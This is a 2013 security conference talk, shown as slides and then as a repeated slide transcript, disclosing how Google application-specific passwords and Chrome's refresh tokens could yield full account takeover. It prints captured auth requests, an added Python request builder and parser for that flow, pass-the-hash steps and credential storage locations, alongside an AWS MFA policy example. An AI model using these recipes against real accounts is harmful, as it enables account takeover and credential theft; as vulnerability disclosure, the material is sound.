Bypassing Strong Authentication... With Passwords?!
Adam Goodman
akgood@duosecurity.com
Passwords13 - 2013-07-31
duosecurity.com
1
0. Kill The Password?
1. Bypassing Google’s 2-Factor Authentication
Google’s 2-Step Verification
What About Non-Web-Based Logins?
Thick-Client Protocols
‣ IMAP
‣ CalDAV
‣ XMPP
‣ ...
Google Software (Interim Solution)
‣ Android
‣ Chrome
Application-Specific Passwords
‣ 16 lowercase letters
‣ Randomly-Generated by Google
‣ Individually Revokable
‣ Not intended to be memorized
sounds a bit like an OAuth token...
ASPs vs. OAuth Tokens
‣ ASPs have to be generated manually
‣ ASPs aren’t actually Application-Specific!
Not-So-Application-Specific
“Another weakness of ASP is the misimpression that it provides application-limited rather than full-scope account access.”
- Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1
Detour: Android Auto-Login
Also:
‣ Chromebooks
‣ Desktop versions of Chrome (if enabled in chrome://flags)
‣ ...?
Detour: Android Auto-Login
Worked even for the most sensitive parts of https://accounts.google.com:
‣ 2FA settings: https://accounts.google.com/b/0/SmsAuthConfig?hl=en
‣ Account-Recovery Settings: https://accounts.google.com/b/0/UpdateAccountRecoveryOptions?hl=en&service=oz
So...
‣ ASPs can link an Android device to your account, and
‣ With auto-login, Android devices could - with no additional authentication - take over your account completely!
Let’s Figure Out How This Works...
Android HTTPS Interception, v1
‣ Real device (Google Nexus S) with a custom default gateway
‣ Linux desktop running sslsniff: http://www.thoughtcrime.org/software/sslsniff/
‣ Custom CA certificate
Let’s Figure Out How This Works...
Android HTTPS Interception, v2
‣ Android Emulator, started with: $ emulator -http-proxy localhost:8080 @avd_name
‣ Burp Suite Proxy: http://portswigger.net/burp/
‣ Custom CA certificate
Basic Workflow
‣ POST to https://android.clients.google.com/auth
‣ Send Email, EncryptedPasswd, service=ac2dm
‣ Receive “Token”
‣ POST to https://android.clients.google.com/auth
‣ Send Email, Token, service=urlquote(“weblogin:continue=https://accounts.google.com/ManageAccount”)
‣ Receive “MergeSession” URL
‣ Open the MergeSession URL; get instantly logged into your account!
Step 1: Request
POST /auth HTTP/1.1
Host: android.clients.google.com
...
accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1
&EncryptedPasswd=AFcb4...&service=ac2dm&source=android&androidId=3281f33679ccc6c6
&device_country=us&operatorCountry=us&lang=en&sdk_version=17
Step 1: Response
HTTP/1.1 200 OK
...
SID=DQAAANwAAAVMG4uYt2HaF...
Auth=DQAAAOAAAACRbLC5-dgM...
services=goanna_mobile,apps,...
Email=akgood@arbsec.org
Token=1/fXrv8D3fLP1mOBj3o1...
GooglePlusUpgrade=1
firstName=Adam
lastName=Goodman
Step 1: EncryptedPasswd?
The same request also works with a plaintext Passwd parameter in place of EncryptedPasswd:
POST /auth HTTP/1.1
Host: android.clients.google.com
...
accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1
&Passwd=xxxxxxxxxxxxxxxx&service=ac2dm&source=android&androidId=3281f33679ccc6c6
&device_country=us&operatorCountry=us&lang=en&sdk_version=17
Step 2: Request
POST /auth HTTP/1.1
Host: android.clients.google.com
...
accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&Token=1%2FfXrv8D3fLP1mOBj3o1...
&service=weblogin%3Acontinue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount
&source=android&androidId=3281f33679ccc6c6&app=com.android.browser
&client_sig=61ed377e85d386a8dfee6b864bd85b0bfaa5af81
&device_country=us&operatorCountry=us&lang=en&sdk_version=17
Step 2: Response
HTTP/1.1 200 OK
...
Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin
Expiry=0
Simplified Workflow
‣ POST to https://android.clients.google.com/auth
‣ Send Email, Passwd, service=urlquote(“weblogin:continue=https://accounts.google.com/ManageAccount”)
‣ Receive “MergeSession” URL
Go from Application-Specific Password to full account takeover with one API call!
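As an added example (not part of Adam Goodman’s slides), the one-call flow above expressed in Python: it builds the form body with the double-encoded service parameter seen in the Step 2 capture and parses the key=value response into the MergeSession pieces. It sends nothing over the network; the sample response and the token values in it are constructed, the androidId is a placeholder, and client_sig is left out because the slide elides it. Google’s February 2013 fix changed what such a session may reach, so this documents the exchange rather than providing a working bypass.

```python
# Added example (not from the slides): request builder and response parser for
# the android.clients.google.com/auth exchange shown on the Step 2 and
# "Simplified Workflow" slides. No network I/O; all sample values are constructed.
from urllib.parse import quote, urlencode, urlsplit, parse_qs

AUTH_URL = "https://android.clients.google.com/auth"


def weblogin_service(continue_url: str) -> str:
    """Build the 'service' value. The continue URL is percent-encoded once here
    and urlencode() encodes the whole value a second time, which is why the
    capture shows https%253A%252F%252F... (double-encoded)."""
    return "weblogin:continue=" + quote(continue_url, safe="")


def build_auth_body(email: str, passwd: str, continue_url: str,
                    android_id: str = "0000000000000000") -> str:
    """Form body for the single-call variant (parameter names taken from the
    captured requests, client_sig omitted). android_id is a placeholder, not a
    real device ID (assumption)."""
    params = [
        ("accountType", "HOSTED_OR_GOOGLE"),
        ("Email", email),
        ("has_permission", "1"),
        ("Passwd", passwd),  # an application-specific password works here too
        ("service", weblogin_service(continue_url)),
        ("source", "android"),
        ("androidId", android_id),
        ("app", "com.android.browser"),
        ("device_country", "us"),
        ("operatorCountry", "us"),
        ("lang", "en"),
        ("sdk_version", "17"),
    ]
    return urlencode(params)


def parse_auth_response(body: str) -> dict:
    """The endpoint answers with one key=value pair per line."""
    out = {}
    for line in body.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            out[key.strip()] = value.strip()
    return out


def merge_session_target(auth_value: str) -> dict:
    """For a weblogin: request the 'Auth' value is a MergeSession URL; pull out
    the uberauth token and decode the continue URL (two layers of encoding)."""
    parts = urlsplit(auth_value)
    qs = parse_qs(parts.query)
    args = parse_qs(qs["args"][0])  # qs already decoded one layer
    return {
        "host": parts.netloc,
        "path": parts.path,
        "uberauth": qs["uberauth"][0],
        "continue": args["continue"][0],
        "source": qs.get("source", [""])[0],
    }


# Constructed sample response in the shape of the Step 2 response slide;
# the uberauth value is invented.
SAMPLE_RESPONSE = (
    "Auth=https://accounts.google.com/MergeSession?args=continue"
    "%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount"
    "&uberauth=APexample000&source=AndroidWebLogin\n"
    "Expiry=0\n"
)

if __name__ == "__main__":
    print(build_auth_body("user@example.com", "abcdefghijklmnop",
                          "https://accounts.google.com/ManageAccount"))
    print(merge_session_target(parse_auth_response(SAMPLE_RESPONSE)["Auth"]))
```

The point to take away is in weblogin_service: a value that is itself a URL gets encoded twice on the wire, which is exactly what the capture shows, and the response parser is all a client needs to turn the single reply into a browser session.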
Timeline
‣ 2012/07/16: Duo researchers confirm presence of ASP weakness.
‣ 2012/07/18: Issue reported to security@google.com.
‣ 2012/07/20: Communication with Google Security Team clarifying the issue.
‣ 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team.
‣ 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces.
‣ 2013/02/25: Public disclosure by Duo.
Google’s Fix
‣ Sensitive account-settings pages are no longer accessible via auto-login (you must enter username/password/OTP)
‣ Essentially nothing else has changed
Multiple Discovery
‣ http://grkvlt.blogspot.co.uk/2012/08/google-tfa-security-issue.html
‣ http://connect.ncircle.com/ncircle/attachments/ncircle/VERTBlog/173/1/CraigYoung_BSidesSlides-2SV.pdf
Evaluation
2-step Verification Still Helps...
‣ Phishing (a captured password alone no longer logs in to the web interface)
‣ Password reuse between services (where one of them has an insecure password database)
... But ASPs Can Be Stolen
HTTPS Man-In-The-Middle
‣ Thick-client applications are notoriously bad at checking SSL certificates: https://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html
Malware can grab stored passwords...
‣ Windows: Data Protection API (DPAPI)
‣ Encrypts data using a key derived from the user’s logon credential
‣ Any process running under the same user account can decrypt any DPAPI-protected data (unless the application supplies additional secret entropy)
‣ OS X: Keychain
‣ Stronger: per-application access control on each keychain item
Or the password is simply stored in plaintext...
Case Study: Pidgin
‣ Stores passwords in plain text!
‣ https://developer.pidgin.im/wiki/PlainTextPasswords
‣ GTalk / “Hangouts”: (probably) low impact if compromised
‣ If we were storing a credential that only had access to your GTalk account, then storing it in plaintext might be ~OK
‣ GMail: (probably) high impact if compromised
‣ ... and, via the password resets that land in that inbox, all of your other accounts on the internet?!
Not Just Application-Specific Passwords
‣ Chrome on Windows / Mac / Linux has the same “auto-login” functionality
‣ ... but it’s using OAuth2 now!
Workflow
‣ POST to https://accounts.google.com/o/oauth2/token
‣ send refresh_token, client_id, client_secret (the latter two are hardcoded into Chrome)
‣ receive access_token
‣ GET to https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
‣ send access_token in Authorization header
‣ get “uberauth” token back
‣ Use “uberauth” token to construct a MergeSession URL
How Is The Refresh Token Stored?
from (e.g.) ~/Library/Application Support/Google/Chrome/Default/Preferences:
...
"oauth2LoginRefreshToken": {
  "status": "Successful",
  "value": "1/0209_TGZzDyfxwozFV..."
}
...
OAuth2 Won’t (automagically) Save You
Unexpected threat models:
‣ You think you are trusting Chrome with your tabs/bookmarks/history/etc.; the refresh token it stores actually grants access to your entire Google account!
2. Passing The Hash In Windows Networks... Even When Passwords Are “Disabled”
(borrowing in part from http://www.foofus.net/~hinge/presos/insidious-implicit-windows-trust-relationships.pdf)
Local vs Domain Logins
‣ Local
‣ Password hashes are stored on your workstation
‣ Domain
‣ Password hashes are stored on the Domain Controller
‣ Your workstation will cache them, sometimes (and LSASS holds the hashes of currently logged-on users in memory)
‣ Both Local and Domain accounts can be administrators on your workstation
[Diagram: several workstations, another server and the Domain Controller]
Authentication In Windows Networks
‣ NTLM Authentication
‣ Kerberos
‣ ...
NTLM Authentication
‣ Challenge-response protocol
‣ Uses the NTLM hash of the user’s password, not the password itself!
‣ One-way hash function (MD4 over the UTF-16LE password)
‣ No salting, no PBKDF2 ... so the hash is a password-equivalent
‣ Extremely pervasive in Windows ecosystems
‣ RPCs
‣ SMB mounts
‣ ...
Pass-The-Hash
NTLM Authentication only requires the NTLM Hash!
‣ Gain local admin rights on a single workstation (somehow...)
‣ Extract NTLM Hashes
‣ Use them to compromise other machines in the network!
[Diagram: workstations, another server and the Domain Controller]
What About Smart-Cards?
Public/Private Key-pair and Certificate stored on cryptographic hardware
‣ Private Key can “never” be extracted
‣ Authenticate by asking the smartcard to digitally sign a value (basically, challenge-response)
‣ Windows can do certificate-based user authentication
Sounds much better, right?
What About Smart-Cards?
“In order to support NTLM authentication [MS-NLMP] for applications connecting to network services that do not support Kerberos authentication, when PKCA is used, the KDC returns the user's NTLM one-way function (OWF) in the privilege attribute certificate (PAC) PAC_CREDENTIAL_INFO buffer ([MS-PAC] section 2.6.1).”
- [MS-PKCA]: Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos Protocol
http://msdn.microsoft.com/en-us/library/cc238455.aspx
In other words: even after a smart-card-only logon, the workstation receives the user’s NTLM hash, and that hash can be passed like any other.
Evaluation
Smart cards still help against...
‣ Weak passwords
‣ Passwords shared between accounts / systems
But pass-the-hash attacks can still be a threat!
3. Some Conclusions
Real-world ecosystems tend to have multiple, distinct authentication scenarios...
... passwords (or similar stored-secret authentication methods) are likely to continue to exist in some scenarios ...
... in each scenario, we must carefully balance privileges with trust
Authentication Scenarios and Trust
Rights
‣ What is the maximum set of permissions that should be granted to a user?
Integrity Level
‣ How strongly has a user / client authenticated?
4. Amazon Web Services: Identity and Access Management (IAM)
Identity And Access Management (IAM)
‣ A single AWS account can have multiple users
‣ Flexible Rights-Expression Language, based on:
‣ Resources (e.g. EC2 Instances, DNS zones, ...)
‣ Actions (e.g. start instance, stop instance, ...)
‣ Other session context (e.g. client IP address, SSL usage, whether 2FA was used, ...)
IAM Policy Example
{
  "Version": "2012-10-17",
  "Statement": [{
    "Action": ["ec2:StopInstances", "ec2:TerminateInstances"],
    "Effect": "Deny",
    "Resource": ["*"],
    "Condition": {
      "Null": {"aws:MultiFactorAuthAge": "true"}
    }
  }]
}
Deny these actions whenever the request was not made with 2-factor authentication, i.e. whenever aws:MultiFactorAuthAge is absent from the request context
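Added example (not from the slides, and not AWS’s evaluation engine): a small evaluator for the Deny statement above, run against two constructed request contexts, to show that the Null condition matches exactly when aws:MultiFactorAuthAge is missing from the request context, i.e. when the call was made with plain long-term keys rather than MFA-backed STS credentials. Only the operators this policy needs (plus Bool) are modelled, and a real request still needs an Allow elsewhere.

```python
# Added example (not from the slides): a deliberately minimal IAM evaluator
# covering Effect Deny, Action/Resource globs and the Null and Bool condition
# operators. Deny-overrides semantics only; Allow handling is out of scope.
import fnmatch
import json

POLICY_JSON = """
{
  "Version": "2012-10-17",
  "Statement": [{
    "Action": ["ec2:StopInstances", "ec2:TerminateInstances"],
    "Effect": "Deny",
    "Resource": ["*"],
    "Condition": {
      "Null": {"aws:MultiFactorAuthAge": "true"}
    }
  }]
}
"""


def _as_list(value):
    return value if isinstance(value, list) else [value]


def condition_matches(condition: dict, context: dict) -> bool:
    """Every operator/key pair in a Condition block must hold (logical AND)."""
    for operator, tests in condition.items():
        for key, expected in tests.items():
            present = context.get(key) is not None
            if operator == "Null":
                # "true" matches when the key is ABSENT, "false" when it is present
                if present != (str(expected).lower() == "false"):
                    return False
            elif operator == "Bool":
                if not present or str(context[key]).lower() != str(expected).lower():
                    return False
            else:
                raise ValueError(f"operator {operator} not modelled in this example")
    return True


def statement_applies(stmt: dict, action: str, resource: str, context: dict) -> bool:
    actions = _as_list(stmt.get("Action", []))
    resources = _as_list(stmt.get("Resource", []))
    return (any(fnmatch.fnmatchcase(action, pat) for pat in actions)
            and any(fnmatch.fnmatchcase(resource, pat) for pat in resources)
            and condition_matches(stmt.get("Condition", {}), context))


def is_explicitly_denied(policy: dict, action: str, resource: str, context: dict) -> bool:
    """Deny-overrides: a single matching Deny statement settles the request."""
    return any(s.get("Effect") == "Deny" and statement_applies(s, action, resource, context)
               for s in _as_list(policy["Statement"]))


POLICY = json.loads(POLICY_JSON)

# Constructed request contexts. With long-term access keys there is no
# aws:MultiFactorAuthAge key at all; with STS credentials issued after an MFA
# check it carries the seconds elapsed since that check.
NO_MFA_CONTEXT = {"aws:SourceIp": "203.0.113.10"}
MFA_CONTEXT = {"aws:SourceIp": "203.0.113.10", "aws:MultiFactorAuthAge": 120}

if __name__ == "__main__":
    for name, ctx in (("no MFA", NO_MFA_CONTEXT), ("MFA", MFA_CONTEXT)):
        for action in ("ec2:TerminateInstances", "ec2:DescribeInstances"):
            denied = is_explicitly_denied(POLICY, action, "*", ctx)
            print(f"{name:6} {action:22} {'DENIED' if denied else 'not denied'}")
```

The evaluator makes the slide’s caveat visible: the Deny only bites for the two listed actions, and only because the Null test looks at whether the key exists rather than at its value; the condition says nothing about how long ago the MFA check happened.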
2-Factor Authentication for API Clients
AWS Security Token Service (STS)
‣ Provide API credentials and a one-time passcode to a specific endpoint (GetSessionToken with the MFA device’s SerialNumber and TokenCode)
‣ Get a new set of temporary credentials back; requests signed with them carry aws:MultiFactorAuthAge
Evaluation
AWS gives you all the tools to build strong, flexible authorization policies...
... but you have to actually build them!
AWS is intended for developers (and other savvy types)
Questions?
Security exploits of Google application specific passwords & Chrome’s OAuth2 tokens

  • 1. Bypassing Strong Authentication... With Passwords?! Adam Goodman akgood@duosecurity.com Passwords13 - 2013-07-31 duosecurity.com 1
  • 2. 0. Kill The Password? duosecurity.com 2
  • 6. 1. Bypassing Google’s 2-Factor Authentication duosecurity.com 6
  • 11. What About Non-Web-Based Logins? Thick-Client Protocols ‣ IMAP ‣ CalDAV ‣ XMPP ‣ ... Google Software (Interim Solution) ‣ Android ‣ Chrome duosecurity.com 11
  • 13. Application-Specific Passwords ‣ 16 lowercase letters ‣ Randomly-Generated by Google ‣ Individually Revokable ‣ Not intended to be memorized sounds a bit like... duosecurity.com 13
  • 14. ASPs vs. OAuth Tokens ‣ ASPs have to be generated manually ‣ ASPs aren’t actually Application-Specific! duosecurity.com 14
  • 15. Not-So-Application-Specific “Another weakness of ASP is the misimpression that is provides application-limited rather than full-scope account access.” - Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1 duosecurity.com 15
  • 16. Detour: Android Auto-Login Also: ‣ Chromebooks ‣ Desktop versions of Chrome (if enabled in chrome://flags) ‣ ...? duosecurity.com 16
  • 17. Detour: Android Auto-Login Worked even for the most sensitive parts of https://accounts.google.com: ‣ 2FA settings: https://accounts.google.com/b/0/SmsAuthConfig?hl=en ‣ Account-Recovery Settings: https://accounts.google.com/b/0/ UpdateAccountRecoveryOptions?hl=en&service=oz duosecurity.com 17
  • 18. So... ‣ ASPs can link an Android device, and ‣ With auto-login, Android devices could - with no additional authentication - take over your account completely! duosecurity.com 18
  • 19. Let’s Figure Out How This Works... Android HTTPS Interception, v1 ‣ Real Device (Google Nexus S) with a custom default gateway ‣ Linux Desktop, running sslsniff ‣ http://www.thoughtcrime.org/software/sslsniff/ ‣ Custom CA certificate duosecurity.com 19
  • 20. Let’s Figure Out How This Works... Android HTTPS Interception, v2 ‣ Android Emulator ‣ $ emulator -http-proxy localhost:8080 @avd_name ‣ Burp Suite Proxy ‣ http://portswigger.net/burp/ ‣ Custom CA certificate duosecurity.com 20
  • 22. Basic Workflow ‣ POST to https://android.clients.google.com/auth ‣ Send Email, EncryptedPasswd, service=ac2dm ‣ Receive “Token” ‣ POST to https://android.clients.google.com/auth ‣ Send Email, Token, service=urlquote(“weblogin:continue=https://accounts.google.com/ ManageAccount”) ‣ Receive “MergeSession” URL ‣ Open the MergeSession URL; get instantly logged into your account! duosecurity.com 22
  • 23. Step 1
    POST /auth HTTP/1.1
    Host: android.clients.google.com
    ...
    accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1&EncryptedPasswd=AFcb4...&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us&lang=en&sdk_version=17
  • 24. Step 1
    HTTP/1.1 200 OK
    ...
    SID=DQAAANwAAAVMG4uYt2HaF...
    Auth=DQAAAOAAAACRbLC5-dgM...
    services=goanna_mobile,apps,...
    Email=akgood@arbsec.org
    Token=1/fXrv8D3fLP1mOBj3o1...
    GooglePlusUpgrade=1
    firstName=Adam
    lastName=Goodman
  • 25. Step 1: EncryptedPasswd?
    POST /auth HTTP/1.1
    Host: android.clients.google.com
    ...
    accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1&Passwd=xxxxxxxxxxxxxxxx&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us&lang=en&sdk_version=17
  • 26. Step 2
    POST /auth HTTP/1.1
    Host: android.clients.google.com
    ...
    accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&Token=1%2FfXrv8D3fLP1mOBj3o1......&service=weblogin%3Acontinue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&source=android&androidId=3281f33679ccc6c6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b864bd85b0bfaa5af81&device_country=us&operatorCountry=us&lang=en&sdk_version=17
  • 27. Step 2
    HTTP/1.1 200 OK
    ...
    Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin
    Expiry=0
  • 28. Simplified Workflow
    ‣ POST to https://android.clients.google.com/auth
      ‣ Send Email, Passwd, service=urlquote(“weblogin:continue=https://accounts.google.com/ManageAccount”)
      ‣ Receive “MergeSession” URL
    Go from Application-Specific Password to full account takeover with one API call!
  • 29. Timeline
    ‣ 2012/07/16: Duo researchers confirm presence of ASP weakness.
    ‣ 2012/07/18: Issue reported to security@google.com.
    ‣ 2012/07/20: Communication with Google Security Team clarifying the issue.
    ‣ 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team.
    ‣ 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces.
    ‣ 2013/02/25: Public disclosure by Duo.
  • 30. Google’s Fix
    ‣ Sensitive account-settings pages are no longer accessible via auto-login (you must enter username/password/OTP)
    ‣ ~Nothing else has changed
  • 31. Multiple Discovery
    ‣ http://grkvlt.blogspot.co.uk/2012/08/google-tfa-security-issue.html
    ‣ http://connect.ncircle.com/ncircle/attachments/ncircle/VERTBlog/173/1/CraigYoung_BSidesSlides-2SV.pdf
  • 33. 2-Step Verification Still Helps...
    ‣ Phishing
    ‣ Password-sharing between services (with insecure password databases)
  • 34. ... But ASPs Can Be Stolen
    HTTPS Man-In-The-Middle
    ‣ Thick-client applications are notoriously bad at checking SSL certificates: https://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html
    Malware can grab stored passwords...
    ‣ Windows: Data Protection API
      ‣ Encrypts data using a key derived from the user’s logon credential
      ‣ Any process running under the same user account can decrypt any DPAPI-protected data
    ‣ OS X: Keychain
      ‣ Stronger: per-application permissions
    Plaintext...
  • 35. Case Study: Pidgin
    ‣ Plain-Text Passwords!
      ‣ https://developer.pidgin.im/wiki/PlainTextPasswords
    ‣ GTalk / “Hangouts” - (probably) low impact if compromised
      ‣ If we were storing a credential that only had access to your GTalk account, then storing it in plaintext might be ~OK
    ‣ GMail - (probably) high impact if compromised
      ‣ ... all of your other accounts on the internet?!
  • 36. Not Just Application-Specific Passwords
    ‣ Chrome on Windows / Mac / Linux has the same “auto-login” functionality
    ‣ ... but it’s using OAuth2 now!
  • 37. Workflow
    ‣ POST to https://accounts.google.com/o/oauth2/token
      ‣ send refresh_token, client_id, client_secret (the latter two are hardcoded into Chrome)
      ‣ receive access_token
    ‣ GET to https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
      ‣ send access_token in Authorization header
      ‣ get “uberauth” token back
    ‣ Use “uberauth” token to construct a MergeSession URL
  • 38. How Is The Refresh Token Stored?
    from (e.g.) ~/Library/Application Support/Google/Chrome/Default/Preferences:
    ...
    "oauth2LoginRefreshToken": {
      "status": "Successful",
      "value": "1/0209_TGZzDyfxwozFV..."
    }
    ...
  • 39. OAuth2 Won’t (automagically) Save You
    Unexpected threat models:
    ‣ Access to your tabs/bookmarks/history/etc. vs. access to your entire Google account!
  • 40. 2. Passing The Hash In Windows Networks... Even When Passwords Are “Disabled”
    (borrowing in part from http://www.foofus.net/~hinge/presos/insidious-implicit-windows-trust-relationships.pdf)
  • 41. Local vs Domain Logins
    ‣ Local
      ‣ Password hashes are stored on your workstation
    ‣ Domain
      ‣ Password hashes stored on the Domain Controller
      ‣ Your workstation will cache them, sometimes
    ‣ Both Local and Domain accounts can be administrators on your workstation
    [Diagram: three Workstations, a Domain Controller and an Other Server]
  • 42. Authentication In Windows Networks
    ‣ NTLM Authentication
    ‣ Kerberos
    ‣ ...
  • 43. NTLM Authentication
    ‣ Challenge-Handshake Protocol
    ‣ Uses NTLM Hash of user’s password, not the password itself!
      ‣ One-way hash function
      ‣ No salting, no PBKDF2 ...
    ‣ Extremely pervasive in Windows ecosystems
      ‣ RPCs
      ‣ SMB mounts
      ‣ ...
  • 44. Pass-The-Hash
    NTLM Authentication only requires the NTLM Hash!
    ‣ Gain local admin rights on a single workstation (somehow...)
    ‣ Extract NTLM Hashes
    ‣ Use them to compromise other machines in the network!
    [Diagram: three Workstations, a Domain Controller and an Other Server]
  • 45. What About Smart-Cards?
    Public/Private Key-pair and Certificate stored on cryptographic hardware
    ‣ Private Key can “never” be extracted
    ‣ Authenticate by asking the smartcard to digitally sign a value (basically, Challenge-Handshake)
    ‣ Windows can do Certificate-based user authentication
    Sounds much better, right?
  • 46. What About Smart-Cards?
    “In order to support NTLM authentication [MS-NLMP] for applications connecting to network services that do not support Kerberos authentication, when PKCA is used, the KDC returns the user's NTLM one-way function (OWF) in the privilege attribute certificate (PAC) PAC_CREDENTIAL_INFO buffer ([MS-PAC] section 2.6.1).”
    - [MS-PKCA]: Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos Protocol
    http://msdn.microsoft.com/en-us/library/cc238455.aspx
  • 47. Evaluation
    Smart-cards still can help...
    ‣ Weak Passwords
    ‣ Shared Passwords between accounts / systems
    But Pass-The-Hash attacks can still be a threat!
  • 49. Real-world ecosystems tend to have multiple, distinct authentication scenarios...
    ... passwords (or similar stored-secret authentication methods) are likely to continue to exist in some scenarios ...
    ... in each scenario, we must carefully balance privileges with trust
  • 50. Authentication Scenarios and Trust
    Rights
    ‣ What is the maximum set of permissions that should be granted to a user?
    Integrity Level
    ‣ How strongly has a user / client authenticated?
  • 51. 4. Amazon Web Services: Identity and Access Management (IAM)
  • 52. Identity And Access Management (IAM)
    ‣ A single AWS account can have multiple users
    ‣ Flexible Rights-Expression Language, based on:
      ‣ Resources (e.g. EC2 Instances, DNS zones, ...)
      ‣ Actions (e.g. start instance, stop instance, ...)
      ‣ Other session context (e.g. client IP address, SSL usage, whether 2FA was used, ...)
  • 53. IAM Policy Example
    {
      "Version": "2012-10-17",
      "Statement": [{
        "Action": ["ec2:StopInstances", "ec2:TerminateInstances"],
        "Effect": "Deny",
        "Resource": ["*"],
        "Condition": {
          "Null": {"aws:MultiFactorAuthAge": "true"}
        }
      }]
    }
    Deny specific actions if a user didn’t use 2-factor authentication
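As an added example (not from the talk), a small evaluator for the policy above that models IAM's ordering rule (explicit Deny beats Allow, and anything no statement allows is implicitly denied) together with the `Null` condition operator: `aws:MultiFactorAuthAge` is only present in the request context when the session's credentials were obtained with MFA, so `"Null": {"aws:MultiFactorAuthAge": "true"}` fires exactly for sessions that skipped the second factor. The Allow statement, the instance ARN and the two request contexts are constructed for the example; real IAM evaluates many more operators and policy types.

```python
import fnmatch
import json

# The Deny statement from the slide, plus a constructed Allow statement
# (a real policy needs one, since IAM denies everything by default).
POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["ec2:*"], "Resource": ["*"]},
    {"Effect": "Deny",
     "Action": ["ec2:StopInstances", "ec2:TerminateInstances"],
     "Resource": ["*"],
     "Condition": {"Null": {"aws:MultiFactorAuthAge": "true"}}}
  ]
}""")

def _matches(patterns, value):
    # Action and Resource elements take "*" and "?" wildcards; action names are case-insensitive
    return any(fnmatch.fnmatchcase(value.lower(), p.lower()) for p in patterns)

def _condition_holds(condition, context):
    # Only the "Null" operator is modelled: "true" asserts the key is ABSENT from the request
    # context, "false" that it is present.
    for operator, tests in condition.items():
        if operator != "Null":
            raise NotImplementedError(f"condition operator {operator} is not modelled here")
        for key, want_absent in tests.items():
            if (key not in context) != (want_absent == "true"):
                return False
    return True

def evaluate(policy, action, resource, context):
    """Return "Allow" or "Deny" for one request: a matching explicit Deny ends evaluation,
    a matching Allow is remembered, and a request nothing allows is implicitly denied."""
    decision = "Deny"
    for statement in policy["Statement"]:
        if not _matches(statement["Action"], action):
            continue
        if not _matches(statement["Resource"], resource):
            continue
        if not _condition_holds(statement.get("Condition", {}), context):
            continue
        if statement["Effect"] == "Deny":
            return "Deny"
        decision = "Allow"
    return decision

INSTANCE = "arn:aws:ec2:us-east-1:123456789012:instance/i-0123456789abcdef0"  # constructed ARN
MFA_SESSION = {"aws:MultiFactorAuthAge": "120"}  # second factor presented 120 s ago
PASSWORD_ONLY_SESSION = {}                       # key absent: no MFA behind these credentials
```

With these inputs, TerminateInstances is allowed for MFA_SESSION and denied for PASSWORD_ONLY_SESSION, while DescribeInstances stays allowed for both because the Deny names only the two destructive actions.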
  • 54. 2-Factor Authentication for API Clients
    Amazon Secure Token Service
    ‣ Provide API credentials and a one-time passcode to a specific endpoint
    ‣ Get a new set of temporary credentials back
  • 55. Evaluation
    AWS gives you all the tools to build strong, flexible authorization policies...
    ... but you have to actually build them!
    AWS is intended for developers (and other savvy types)